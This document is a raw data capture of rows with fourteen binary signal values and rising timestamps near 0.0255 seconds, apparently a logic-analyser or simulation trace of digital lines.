1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464400e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464428e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464580e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464600e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464628e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464776e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464800e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464828e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464924e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464976e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465000e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465028e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465176e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465200e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465228e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465376e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465400e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465428e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465480e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465508e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465532e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5465556e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5465580e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,2.5465584e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5465588e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5590132e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5590356e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5590380e-02 0,1,0,0,1,1,0,0,0,1,0,1,0,1,2.5590396e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5590424e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,1,2.5590804e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5590828e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5590836e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5590852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5590876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5590900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5590924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5590948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5590976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5591000e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591176e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591200e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591276e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5591280e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5591324e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5591352e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591356e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591376e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591400e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591428e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591452e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591476e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591500e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5591508e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5591552e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5591576e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5591580e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591584e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591600e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591876e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5591880e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5591924e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5591952e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5591956e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5591976e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592000e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592028e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592052e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592076e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592100e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592148e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5592156e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5592204e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5592228e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5592232e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592236e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592324e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5592332e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5592376e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5592404e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592408e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592424e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592452e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592476e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592500e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592524e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592548e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592576e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592600e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592624e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592652e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592676e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592700e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592748e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592776e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592800e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592824e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592852e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592876e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592900e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,2.5592904e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5592908e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5592952e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5592976e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5592980e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5592984e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5592996e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593024e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5593028e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5593076e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5593100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593108e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593148e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593176e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593196e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593224e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593252e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593276e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593300e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,2.5593304e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5593308e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5593352e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5593376e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5593380e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593384e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593396e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593424e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593596e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593624e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593824e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5593900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5593924e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5593932e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5593976e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5594000e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594008e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594024e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594052e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594076e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594100e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594148e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594176e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594200e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5594204e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5594224e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5594252e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5594276e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5594300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594308e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594352e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594424e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594452e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594476e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594500e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594524e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594548e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594576e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594600e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5594604e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5594652e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5594676e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594684e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5594948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5594976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595000e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595176e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595200e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595324e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5595332e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5595348e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5595376e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5595400e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5595428e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5595432e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595436e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595476e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595500e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595552e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595600e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595676e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5595680e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5595724e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5595752e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595756e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595776e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595800e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595828e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595852e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595876e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595900e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5595924e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5595948e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5595956e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5596004e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5596028e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5596032e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596036e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596176e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596200e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596348e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596400e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596600e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5596948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5596976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597000e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597176e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597200e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597348e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597400e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597480e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597508e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597532e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5597556e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5597580e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,2.5597584e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5597588e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5722104e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5722352e-02 1,1,0,0,1,1,0,0,0,1,0,1,0,1,2.5722372e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5722396e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,1,2.5722700e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5722724e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5722732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5722748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5722776e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5722800e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5722828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5722852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5722876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.5722900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.5722924e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5722936e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5722952e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5722976e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723148e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723176e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5723180e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5723228e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5723252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723260e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723300e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723324e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723348e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723376e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723400e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5723404e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5723452e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5723476e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723484e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723524e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723548e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723576e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723600e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723676e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723724e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723752e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723780e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723800e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5723808e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5723852e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5723876e-02 